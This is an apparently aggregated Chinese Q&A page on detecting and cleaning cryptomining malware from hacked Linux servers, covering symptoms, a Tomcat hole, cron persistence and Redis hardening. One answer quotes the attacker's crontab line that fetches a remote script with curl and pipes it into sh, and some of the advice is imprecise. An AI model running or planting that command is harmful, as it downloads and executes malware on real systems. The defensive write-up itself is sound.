當前位置:首頁 » 挖礦知識 » linux伺服器被黑挖礦

linux伺服器被黑挖礦

發布時間: 2022-08-04 13:47:36

㈠ 求助伺服器被挖礦程序入侵,如何排查

新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接

伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般

會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這

就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客

戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,

仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查

當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病

毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,

客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開

發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重

的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,

SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器

一切穩定運行,網站打開正常。

㈡ linux如何快速排查系統是否被黑

通過檢查機器被黑的症狀即可.
一般來說, 被黑的機器都會被黑客用於發包或者挖礦, 發包通過監控網卡流量數據即可檢測, 挖礦可以使用top命令檢測CPU佔用率, 發現異常後建議及時備份數據並重裝系統.

㈢ 如何用Linux伺服器挖礦教程

今天早上起來一看,伺服器腳本一個都沒有啟動!甚是奇怪,遠程登錄伺服器,也是異常的卡,直到最後卡死,只好重新啟動伺服器!
啟動之後沒一會又會變卡,越來越卡,top查看進程!不覺又奇怪的進程,因為平常也不經常看!所以自己也搞不明白怎麼回事兒!只好到群里問了問,說是被挖礦的掛了木馬文件了,是由於redis的漏洞!
後來我自己發現,原來redis遠程可以直接登錄,原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢,看來是我想多了
看了好長時間才發現一個異常的進程,自啟的進程 molibe !
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下,打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下,cat root 查看定時器的執行發現之前腳本都被改了,顧不得刪除cron,service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了!但是根本是因為redis漏洞,所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)

㈣ 伺服器被下挖礦了怎麼辦

哥們被下了啥挖礦?去舉報啊。之前流量礦石非常火的時候,我的伺服器也被無良黑了,成了肉雞,然後我去找到他的信息,截圖跟流量礦石舉報,就幫我處理了。你看你的被下了啥,就去找他們處理。

㈤ linux伺服器受到黑客侵害怎麼辦

花錢購買 Linux 售後服務,很多廠家的售後服務都可以幫你設置 Linux 來防止被攻擊。另外,隨時更新系統也是防止被黑的一個重要手段。

最主要的還是:管 Linux 伺服器的人必須會用 Linux ,這是一個最最最重要的前提。這裡面還有的是 IT 主管必須是一個真正能管 IT 的人,別弄一個就會聽人忽悠的腦殘主管。
不然被真有技術的公司忽悠了還行,要是被技術特爛的公司忽悠,那就徹底完了。就像倫敦證交所一樣,被忽悠用了微軟的東西,結果延遲、停擺,不得不換回 Linux 。

㈥ Linux伺服器被黑客入侵後該怎麼辦

如果伺服器上的東西不復雜,備份一下,重裝下系統,因為沒法確定他在你的伺服器上安裝了什麼東西

㈦ Linux系統被Carbon挖礦病毒入侵,殺掉之後過一段時間又起來了,有誰遇到過這種情況啊

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後,使用裡面的病毒查殺功能,直接就可以查殺這種電腦病毒了

㈧ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

㈨ linux被挖礦重裝系統能清除嗎

可以的
xmrig是一種挖礦病毒,通常會搶占伺服器的資源,導致伺服器超負荷運轉,出現服務宕機的情況。

熱點內容
冒險與挖礦類型手游 發布:2024-11-19 13:27:36 瀏覽:554
桂林國際會展中心怎麼坐車去 發布:2024-11-19 13:25:50 瀏覽:899
安妮股份為何是區塊鏈 發布:2024-11-19 13:20:34 瀏覽:804
trx智能合約鏈怎麼樣 發布:2024-11-19 13:20:27 瀏覽:543
幣圈二爺發話視頻 發布:2024-11-19 13:18:05 瀏覽:878
區塊鏈銷售和運營哪個有前景 發布:2024-11-19 13:17:15 瀏覽:918
比特幣的中國創始人是誰 發布:2024-11-19 13:11:07 瀏覽:611
區塊鏈技術力助大健康事業 發布:2024-11-19 12:53:20 瀏覽:217
區塊鏈怎麼解決的拜占庭問題 發布:2024-11-19 12:52:31 瀏覽:474
2018年區塊鏈粉絲經濟 發布:2024-11-19 12:40:44 瀏覽:65